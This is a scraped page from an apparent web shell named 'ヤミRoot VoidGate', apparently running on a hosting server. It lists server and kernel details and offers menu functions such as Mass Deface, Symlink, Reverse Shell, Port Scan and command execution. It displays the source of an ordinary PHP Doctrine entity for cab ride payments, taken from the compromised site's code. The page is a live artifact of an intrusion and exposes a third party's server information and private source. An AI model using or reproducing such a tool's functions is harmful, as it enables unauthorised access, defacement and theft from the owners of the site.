ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Entity
/
Viewing: CabRidePayment.php
<?php namespace AppBundle\Entity; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; /** * CabRidePayment * * @ORM\Table(name="cab_ride_payment") * @ORM\Entity(repositoryClass="AppBundle\Repository\CabRidePaymentRepository") */ class CabRidePayment { /** * @var int * * @ORM\Column(name="id", type="integer") * @ORM\Id * @ORM\GeneratedValue(strategy="AUTO") * @Serializer\Groups({"LIST", "CAB_RIDE_PAYMENT_DETAILS"}) */ private $cabRidePaymentId; /** * @var \AppBundle\Entity\CabBooking * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\CabBooking") * @Serializer\Groups({"LIST", "CAB_RIDE_PAYMENT_DETAILS"}) * @Serializer\MaxDepth(1) */ private $cabBooking; /** * @var \AppBundle\Entity\PaymentService * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\PaymentService") * @Serializer\Groups({"LIST", "CAB_RIDE_PAYMENT_DETAILS"}) * @Serializer\MaxDepth(1) */ private $paymentService; /** * @var int * * @ORM\Column(name="amount", type="integer") * @Serializer\Groups({ "CAB_RIDE_PAYMENT_DETAILS"}) */ private $amount; /** * @var string * * @ORM\Column(name="reference", type="string", length=255, nullable=true) * @Serializer\Groups({"CAB_RIDE_PAYMENT_DETAILS"}) */ private $reference; /** * @var \AppBundle\Entity\Staff * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Staff") * @Serializer\Groups({"CAB_RIDE_PAYMENT_DETAILS"}) * @Serializer\MaxDepth(1) */ private $operator; /** * @var \DateTime * * @ORM\Column(name="createdAt", type="datetime") * @Serializer\Groups({"LIST", "CAB_RIDE_PAYMENT_DETAILS"}) */ private $createdAt; public function __construct($cabBooking = null, $paymentService = null, $amount = null, $reference = null, $operator = null) { $this->cabBooking = $cabBooking; $this->paymentService = $paymentService; $this->amount = $amount; $this->reference = $reference; $this->operator = $operator; $this->createdAt = new \DateTime(); } /** * Set amount * * @param integer $amount * * @return CabRidePayment */ public function setAmount($amount) { $this->amount = $amount; return $this; } /** * Get amount * * @return integer */ public function getAmount() { return $this->amount; } /** * Set reference * * @param string $reference * * @return CabRidePayment */ public function setReference($reference) { $this->reference = $reference; return $this; } /** * Get reference * * @return string */ public function getReference() { return $this->reference; } /** * Set createdAt * * @param \DateTime $createdAt * * @return CabRidePayment */ public function setCreatedAt($createdAt) { $this->createdAt = $createdAt; return $this; } /** * Get createdAt * * @return \DateTime */ public function getCreatedAt() { return $this->createdAt; } /** * Set cabBooking * * @param \AppBundle\Entity\CabBooking $cabBooking * * @return CabRidePayment */ public function setCabBooking(\AppBundle\Entity\CabBooking $cabBooking = null) { $this->cabBooking = $cabBooking; return $this; } /** * Get cabBooking * * @return \AppBundle\Entity\CabBooking */ public function getCabBooking() { return $this->cabBooking; } /** * Set paymentService * * @param \AppBundle\Entity\PaymentService $paymentService * * @return CabRidePayment */ public function setPaymentService(\AppBundle\Entity\PaymentService $paymentService = null) { $this->paymentService = $paymentService; return $this; } /** * Get paymentService * * @return \AppBundle\Entity\PaymentService */ public function getPaymentService() { return $this->paymentService; } /** * Set operator * * @param \AppBundle\Entity\Staff $operator * * @return CabRidePayment */ public function setOperator(\AppBundle\Entity\Staff $operator = null) { $this->operator = $operator; return $this; } /** * Get operator * * @return \AppBundle\Entity\Staff */ public function getOperator() { return $this->operator; } /** * Get cabRidePaymentId * * @return integer */ public function getCabRidePaymentId() { return $this->cabRidePaymentId; } }
Coded With 💗 by
0x6ick